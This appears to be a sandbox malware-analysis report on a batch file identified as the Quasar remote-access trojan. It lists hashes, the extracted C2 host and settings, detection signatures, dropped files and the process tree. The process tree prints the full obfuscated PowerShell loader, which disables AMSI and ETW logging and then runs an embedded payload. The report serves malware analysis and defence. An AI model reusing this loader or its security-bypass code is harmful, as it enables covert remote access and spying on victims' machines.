Overview

overview

10

Static

static

1

Client-built.exe.bat

windows10-ltsc 2021-x64

10

Client-built.exe.bat

windows11-21h2-x64

10

Analysis

  • max time kernel
    112s
  • max time network
    129s
  • platform
    windows11-21h2_x64
  • resource
    win11-20241007-en
  • resource tags

    arch:x64arch:x86image:win11-20241007-enlocale:en-usos:windows11-21h2-x64system
  • submitted
    25-11-2024 23:23

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    Client-built.exe.bat

  • Size

    4.2MB

  • MD5

    8eecabd958ac81525f071d8f8f9c5b4f

  • SHA1

    293f0625c5eafc5193d582244603d5981c5c6ef5

  • SHA256

    8c0ed0a2488582fa19983c458e298b76bad3f81402da794f55d4b5adbf101db3

  • SHA512

    3ecc3d4a22fd945777eea8ca732c3009ca65bc0e44ea388e0602db500da2f20ef2d465ef107a79595ea3f5c89eccbf634fcbb7fb46197a8513a6317450b80704

  • SSDEEP

    49152:B78bwAn48Himx5yYfP0z1TjhIkgbN+7fSnndvcW:a

Score
10/10
quasarfrexecutionspywaretrojan

Malware Config

Extracted

Family

quasar

Version

1.4.1

Botnet

fr

C2

kdotisbetterfr.airdns.org:61875

Mutex

de3f242e-9b27-4bcc-b108-2b89973fa679

Attributes
  • encryption_key

    A9E1D2CBD6699561DDC6C38CE5B7E79D283DC83E

  • install_name

    Client.exe

  • log_directory

    Logs

  • reconnect_delay

    3000

  • startup_key

    Quasar Client Startup

  • subdirectory

    SubDir

Signatures

  • Quasar RAT

    Quasar is an open source Remote Access Tool.

    trojanspywarequasar
  • Quasar family
    quasar
  • Quasar payload 1 IoCs
  • Blocklisted process makes network request 5 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Using powershell.exe command.

    execution
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 6 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Client-built.exe.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:5100
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -exec bypass -C "$kdot_file='C:\Users\Admin\AppData\Local\Temp\Client-built.exe.bat';${kdoTkq`Gent`Obgn}=([SyStEm.TexT.eNcODING]::uTF8.GETstrING((83, 121, 115, 116, 101, 109, 46, 77, 97, 110, 97, 103, 101, 109, 101, 110, 116, 46)) + [SYStEm.TeXT.ENCoDING]::UTf8.geTstrINg((65, 117, 116, 111, 109, 97, 116, 105, 111, 110, 46, 65, 109, 115, 105, 85)) + [SyStem.teXT.ENcoDIng]::uTF8.geTSTRinG([SYsTEM.cOnvErT]::FRoMbase64StRing('dGlscw==')));${kdOtmftjtoczLt}=([SySTEM.TEXT.encoDing]::UTF8.gEtsTrING([SyStEm.ConVerT]::frOMBASe64stRing('YW1zaUluaXRGYWlsZWQ=')));$kdOtrBXZtJMXwe=[REF].aSSEmBly;${k`D`OtinuLtqZ`Mj`I}=$kdotrBXztjMxwe.GettyPE(${k`D`OtkqgeNto`B`Gn});${KDotvlLHOtMVOT}=${kDO`Tinultqz`MJI}.GEtfiEld(${k`Dotmf`TJtOCZLt},([syStEm.Text.ENcoDiNG]::Utf8.getStrING([SyStEm.CONVeRt]::fRomBase64STriNG('Tm9uUHVibGljLFN0YXRpYw=='))));${kdotv`Ll`H`Otm`Vot}.SETVAluE($nULL,(([MaTh]::roUnd([maTH]::Pi) -eq (4583 - 4580))));([REFLEcTIon.aSSembly]::LOaDwITHpaRtIAlnAMe(((([systeM.tEXT.EnCoDinG]::UTf8.gEtSTRING((0x53, 0x79, 0x73, 0x74, 0x65, 0x6d, 0x2e, 0x43, 0x6f, 0x72, 0x65)))))).geTtyPe(((([sYStEm.TeXT.encodING]::utf8.GETsTRINg((0x53, 0x79, 0x73, 116, 101, 109, 46, 68, 105, 0x61, 103, 110, 111, 115, 0x74, 0x69, 99, 115, 0x2e, 0x45)) + [SystEM.TEXt.EncOdInG]::UTF8.GEtstRINg([sysTEM.coNVert]::frOMbAse64stRInG('dmVudGluZy5FdmVudFByb3ZpZGVy')))))).gEtFIELD(((([sYStem.teXt.EnCodIng]::uTf8.gETsTRING((0x6d, 0x5f, 101, 110)) + [sYstEm.Text.ENcodInG]::UTf8.getsTRinG([sYSTeM.cONVERT]::FromBase64STring('YWJsZQ==')) + [system.text.EnCOdiNG]::utF8.GETStRinG((100))))),((([sySTEM.tExT.eNcodInG]::Utf8.GeTstrinG((0x4e, 0x6f, 0x6e, 0x50, 0x75, 0x62, 0x6c, 0x69, 0x63, 0x2c, 0x49, 0x6e, 0x73, 0x74, 0x61, 0x6e, 0x63, 0x65)))))).seTvALue([ref].AssEMBlY.gETtyPE(((([sysTem.tEXT.ENCOdiNg]::utF8.gETString((0x53, 121, 115, 0x74, 0x65, 109, 0x2e, 77, 97, 110, 0x61, 0x67, 0x65, 0x6d, 0x65, 110, 0x74, 46, 65, 0x75, 0x74, 0x6f, 0x6d, 0x61, 0x74, 105, 0x6f)) + [SyStEm.TEXT.eNcoding]::UtF8.getStRING((0x6e, 0x2e, 0x54, 0x72, 0x61, 0x63, 0x69, 0x6e, 0x67, 0x2e, 0x50, 0x53, 0x45, 0x74, 0x77, 0x4c, 0x6f, 0x67, 0x50, 0x72, 0x6f, 0x76, 0x69, 0x64, 0x65, 0x72)))))).getfIEld(((([SYsTeM.tEXt.EncodIng]::utF8.getStriNg((0x65, 116, 0x77, 80, 0x72, 111, 118, 0x69, 0x64, 0x65, 0x72))))),((([syStem.TexT.enCodING]::uTf8.GETstrING([SystEM.CoNveRT]::FromBAse64StrIng('Tm9uUHVibGljLFN0YXRpYw==')))))).GEtVALUe($nUll),0));.([char](((-1880 -Band 3977) + (-1880 -Bor 3977) - 4958 + 2966))+[char](((-5904 -Band 9157) + (-5904 -Bor 9157) + 6302 - 9454))+[char](((-21634 -Band 6735) + (-21634 -Bor 6735) + 8883 + 6136))) ([teXt.EncOdiNG]::utf8.GeTsTRING([COnvERt]::FROmbaSE64striNg((.([char]((10951 - 6660 - 8049 + 3829))+[char]((14226 - 7595 - 9122 + 2592))+[char]((24730 - 8863 - 9864 - 5887))+[char](((-5132 -Band 1756) + (-5132 -Bor 1756) + 8940 - 5519))+[char](((1940 -Band 2956) + (1940 -Bor 2956) - 6449 + 1620))+[char](((-6729 -Band 3763) + (-6729 -Bor 3763) - 545 + 3622))+[char]((-4095 - 1385 + 928 + 4662))+[char]((-6662 - 1701 + 5421 + 3058))+[char](((-2558 -Band 9162) + (-2558 -Bor 9162) - 7234 + 731))+[char](((2844 -Band 3096) + (2844 -Bor 3096) - 1177 - 4653))+[char](((-16140 -Band 2909) + (-16140 -Bor 2909) + 8371 + 4976))) $kDot_file -raw | .([char]((6554 - 7231 + 5942 - 5182))+[char](((3079 -Band 9477) + (3079 -Bor 9477) - 9412 - 3043))+[char](((-4179 -Band 8133) + (-4179 -Bor 8133) - 5058 + 1212))+[char]((19429 - 6371 - 4893 - 8064))+[char](((-8637 -Band 6960) + (-8637 -Bor 6960) + 3708 - 1932))+[char]((-9407 - 2390 + 4965 + 6948))+[char]((3773 - 784 + 6348 - 9292))+[char](((-17685 -Band 7650) + (-17685 -Bor 7650) + 6965 + 3153))+[char]((-1848 - 3742 + 3489 + 2217))+[char](((-15472 -Band 7425) + (-15472 -Bor 7425) - 1465 + 9626))+[char]((1512 - 5248 + 8485 - 4644))+[char](((-10605 -Band 4896) + (-10605 -Bor 4896) + 4426 + 1393))+[char](((3437 -Band 468) + (3437 -Bor 468) + 5827 - 9629))) (([sYSTEm.teXT.eNCODiNG]::utf8.gEtstRing(58)) + ([sySteM.TeXT.ENcodiNg]::uTF8.gETstriNG([sYSTem.convERt]::fRomBasE64StRing('OktET1Q6OiguKik='))))).MaTcheS.GrOUPS[1].vAluE)))"
      2⤵
      • Blocklisted process makes network request
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2432
      • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\mg4sfdpf\mg4sfdpf.cmdline"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:3984
        • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
          C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES9D98.tmp" "c:\Users\Admin\AppData\Local\Temp\mg4sfdpf\CSC7DE2ADD3D2546AE9748F67526E12FB.TMP"
          4⤵
            PID:2444

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Temp\RES9D98.tmp
      Filesize

      1KB

      MD5

      65a199e8cd30e832bed23b27b3686e9a

      SHA1

      749566689c7916119af1c0f995bf092c38b32aa4

      SHA256

      6698f747fc70bdce86d640acbc1a0f7c1d092d4c4a5662f43d513ef5d7f36fbc

      SHA512

      b6eaf33ed66cbbae650af367dbb219dd5b7db21d032c67dd980bfbe992489edc7b1c3a1a221594df16a6f150bd5f73278416a9a47d84ab1e92116f5cd11623b2

      Download Submit

    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_aclr0dr3.dxc.ps1
      Filesize

      60B

      MD5

      d17fe0a3f47be24a6453e9ef58c94641

      SHA1

      6ab83620379fc69f80c0242105ddffd7d98d5d9d

      SHA256

      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

      SHA512

      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

      Download Submit

    • C:\Users\Admin\AppData\Local\Temp\mg4sfdpf\mg4sfdpf.dll
      Filesize

      8KB

      MD5

      5b4cf77e1cf17b93d867513a8bed1498

      SHA1

      1475fec98495cd3376a708d3903152a53a9c6dc0

      SHA256

      af3b972f5bf309169cfbbdff77dfcf1683f2ff717e98305477c601f0b2180320

      SHA512

      bc9cae979b7d265944669064bd479165ab24e0959cd3d993e5e2d91943212cfc7fb10643401b76c83aef7d642eea6ac0d05aa93d060a3f4b0537eede9adfaba2

      Download Submit

    • \??\c:\Users\Admin\AppData\Local\Temp\mg4sfdpf\CSC7DE2ADD3D2546AE9748F67526E12FB.TMP
      Filesize

      652B

      MD5

      acd44c83cb3fc41789ea87542434a352

      SHA1

      4420dcb31124d3334410569dc109b26a3c0b59bf

      SHA256

      0ce5cdb59ee9135653bc4a9cebceb4cdcb18d7c75b4542b95f04c0f785c7d240

      SHA512

      b5c333e7ff7e154e80b15a35db19d805306f20e1bf9653c5bf3273d0a682b5f0d5c63d5f434ce25965f78493bab650b76adb1b1e1bc945feceab1270a0de4f60

      Download Submit

    • \??\c:\Users\Admin\AppData\Local\Temp\mg4sfdpf\mg4sfdpf.0.cs
      Filesize

      11KB

      MD5

      2baccf8bd40aaee5659a70165d301596

      SHA1

      52f6af554b3df57db81005dd6360f4bc39b93531

      SHA256

      6c6ca5f865d9346cd32d84e0122d1bf08051d8b53c47208cef44bd2bb6133884

      SHA512

      dfbe57879f918c029dc628cc27961d63eca88104e8e7fb3aba8c2d1696419d5010c2dfc7e690669835fa50a0344f1ec5f60f714db95112b18c8524e87d1bb51a

      Download Submit

    • \??\c:\Users\Admin\AppData\Local\Temp\mg4sfdpf\mg4sfdpf.cmdline
      Filesize

      369B

      MD5

      e4da76533d98f44321cad556ff5dc299

      SHA1

      f39574afa7da3ce002784f1bd5fe516e8f00e901

      SHA256

      ae0ca955587ffdbeae96130e8c6f26602bbfbc6e4fca071d8dbce0f955d59393

      SHA512

      65c1cdeaef8d44d98fefdd58601e7ea768e27efabab77c3c3b312c5a158d5fd3fc549978b388503b7cf1534747e605027b1a3aa1b71b0ba8dab960389e5a9851

      Download Submit

    • memory/2432-25-0x000002AAE4140000-0x000002AAE4148000-memory.dmp

      Filesize

      32KB

      Download

    • memory/2432-28-0x00007FFBA89E3000-0x00007FFBA89E5000-memory.dmp

      Filesize

      8KB

      Download

    • memory/2432-11-0x00007FFBA89E0000-0x00007FFBA94A2000-memory.dmp

      Filesize

      10.8MB

      Download

    • memory/2432-10-0x00007FFBA89E0000-0x00007FFBA94A2000-memory.dmp

      Filesize

      10.8MB

      Download

    • memory/2432-0-0x00007FFBA89E3000-0x00007FFBA89E5000-memory.dmp

      Filesize

      8KB

      Download

    • memory/2432-1-0x000002AAE4090000-0x000002AAE40B2000-memory.dmp

      Filesize

      136KB

      Download

    • memory/2432-27-0x00007FFBA89E0000-0x00007FFBA94A2000-memory.dmp

      Filesize

      10.8MB

      Download

    • memory/2432-12-0x00007FFBA89E0000-0x00007FFBA94A2000-memory.dmp

      Filesize

      10.8MB

      Download

    • memory/2432-29-0x00007FFBA89E0000-0x00007FFBA94A2000-memory.dmp

      Filesize

      10.8MB

      Download

    • memory/2432-30-0x00007FFBA89E0000-0x00007FFBA94A2000-memory.dmp

      Filesize

      10.8MB

      Download

    • memory/2432-31-0x000002AAFC8A0000-0x000002AAFCBC4000-memory.dmp

      Filesize

      3.1MB

      Download

    • memory/2432-32-0x000002AAFC6F0000-0x000002AAFC740000-memory.dmp

      Filesize

      320KB

      Download

    • memory/2432-33-0x000002AAFD080000-0x000002AAFD132000-memory.dmp

      Filesize

      712KB

      Download

    • memory/2432-34-0x000002AAFD310000-0x000002AAFD4D2000-memory.dmp

      Filesize

      1.8MB

      Download